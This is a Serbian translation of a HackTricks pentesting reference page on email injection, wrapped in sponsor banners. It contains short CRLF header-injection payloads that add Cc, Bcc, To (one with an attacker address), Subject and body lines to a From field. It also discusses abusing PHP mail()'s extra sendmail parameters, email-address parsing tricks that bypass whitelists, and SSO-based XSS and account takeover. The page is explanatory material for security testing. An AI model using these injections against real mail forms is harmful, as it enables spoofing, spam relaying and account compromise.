hacktricks/pentesting-web/email-injections.md

170 lines
9.6 KiB
Markdown

# Email Injections
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Koristite [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) da biste lako izgradili i **automatizovali radne tokove** pokretane najnaprednijim alatima zajednice na svetu.\
Pristupite danas:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
## Ubacivanje u poslati e-mail
### Ubacivanje Cc i Bcc nakon argumenta pošiljaoca
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
Poruka će biti poslata na naloge primaoca i primaoca1.
### Ubacivanje argumenata
```
From:sender@domain.com%0ATo:attacker@domain.com
```
### Ubaci argument Predmet
Poruka će biti poslata originalnom primaocu i nalogu napadača.
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
### Promena tela poruke
Ubacite dva reda razmaka, zatim napišite svoju poruku kako biste promenili telo poruke.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
### Iskorišćavanje funkcije PHP mail()
```bash
# The function has the following definition:
php --rf mail
Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}
```
#### 5. параметар ($additional\_parameters)
Ova sekcija će se bazirati na **kako zloupotrebiti ovaj parametar pretpostavljajući da napadač kontroliše**.
Ovaj parametar će biti dodat u komandnoj liniji koju će PHP koristiti da pozove binarni sendmail. Međutim, biće saniran pomoću funkcije `escapeshellcmd($additional_parameters)`.
Napadač može **ubaciti dodatne parametre za sendmail** u ovom slučaju.
#### Razlike u implementaciji /usr/sbin/sendmail
**sendmail** interfejs je **pružen od strane MTA softvera za e-poštu** (Sendmail, Postfix, Exim itd.) instaliranog na sistemu. Iako **osnovne funkcionalnosti** (kao što su -t -i -f parametri) ostaju **iste** iz razloga kompatibilnosti, **ostale funkcije i parametri** se razlikuju značajno u zavisnosti od instaliranog MTA.
Evo nekoliko primera različitih stranica za sendmail komandu/interfejs:
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences
Zavisno od **porekla sendmail** binarnog fajla, otkrivene su različite opcije za zloupotrebu i **curenje fajlova ili čak izvršavanje proizvoljnih komandi**. Pogledajte kako na [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
## Ubacivanje u ime e-pošte
### Ignorisani delovi e-pošte
Simboli: **+, -** i **{}** u retkim slučajevima mogu se koristiti za označavanje i biti ignorisani od strane većine e-poštanskih servera
* Npr. john.doe+intigriti@example.com → john.doe@example.com
**Komentari između zagrada ()** na početku ili kraju takođe će biti ignorisani
* Npr. john.doe(intigriti)@example.com → john.doe@example.com
### Bypass belih lista
<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### Navodnici
<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### IP adrese
Takođe možete koristiti IP adrese kao imena domena između uglatih zagrada:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### Ostale ranjivosti
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
## SSO treće strane
### XSS
Neke usluge poput **github** ili **salesforce dozvoljavaju** vam da kreirate **e-adresu sa XSS payload-om**. Ako možete **koristiti ove provajdere za prijavu na druge usluge** i ove usluge **ne saniraju** ispravno e-poštu, možete izazvati **XSS**.
### Preuzimanje naloga
Ako **SSO usluga** dozvoljava da **kreirate nalog bez provere date e-adrese** (kao **salesforce**) i zatim možete koristiti taj nalog da se **prijavite na drugu uslugu** koja **veruje** salesforce-u, možete pristupiti bilo kom nalogu.\
_Napomena da salesforce pokazuje da li je data e-adresa verifikovana ili ne, ali aplikacija treba uzeti u obzir ovu informaciju._
## Odgovori
Možete poslati e-poštu koristeći _**Od: company.com**_ i _**Odgovori: attacker.com**_ i ako se bilo koji **automatski odgovor** pošalje zbog toga što je e-pošta poslata **sa** interne adrese, **napadač** može biti u mogućnosti da **primi** taj **odgovor**.
## Stopa tvrdog odbijanja
Određene usluge, poput AWS-a, implementiraju prag poznat kao **Stopa tvrdog odbijanja**, obično postavljen na 10%. Ovo je ključna metrika, posebno za usluge isporuke e-pošte. Kada se ova stopa premaši, usluga, poput AWS-ove usluge e-pošte, može biti suspendovana ili blokirana.
**Tvrdi odbijanje** se odnosi na **e-poštu** koja je vraćena pošiljaocu jer je adresa primaoca nevažeća ili nepostojeća. Ovo se može desiti iz različitih razloga, kao što je slanje e-pošte na nevažeću adresu, domen koji nije stvaran ili odbijanje servera primaoca da prihvati **e-poruke**.
U kontekstu AWS-a, ako pošaljete 1000 e-poruka i 100 od njih rezultiraju tvrdim odbijanjem (zbog razloga poput nevažećih adresa ili domena), to bi značilo stopu tvrdog odbijanja od 10%. Dostizanje ili premašivanje ove stope može pokrenuti blokiranje ili suspenziju vaših sposobnosti slanja e-pošte putem AWS SES (Simple Email Service).
Važno je održavati nisku stopu tvrdog odbijanja kako bi se osigurala neprekidna usluga e-pošte i očuvala reputacija pošiljaoca. Praćenje i upravljanje kvalitetom adresa e-pošte na vašim listama za slanje može značajno pomoći u postizanju ovog cilja.
Za detaljnije informacije, može se pogledati zvanična dokumentacija AWS-a o rukovanju odbijanjima i prigovorima na [AWS SES Rukovanje odbijanjima](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).
## Reference
* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Koristite [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) da lako izgradite i **automatizujete radne tokove** pokretane najnaprednijim alatima zajednice na svetu.\
Pristupite danas:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}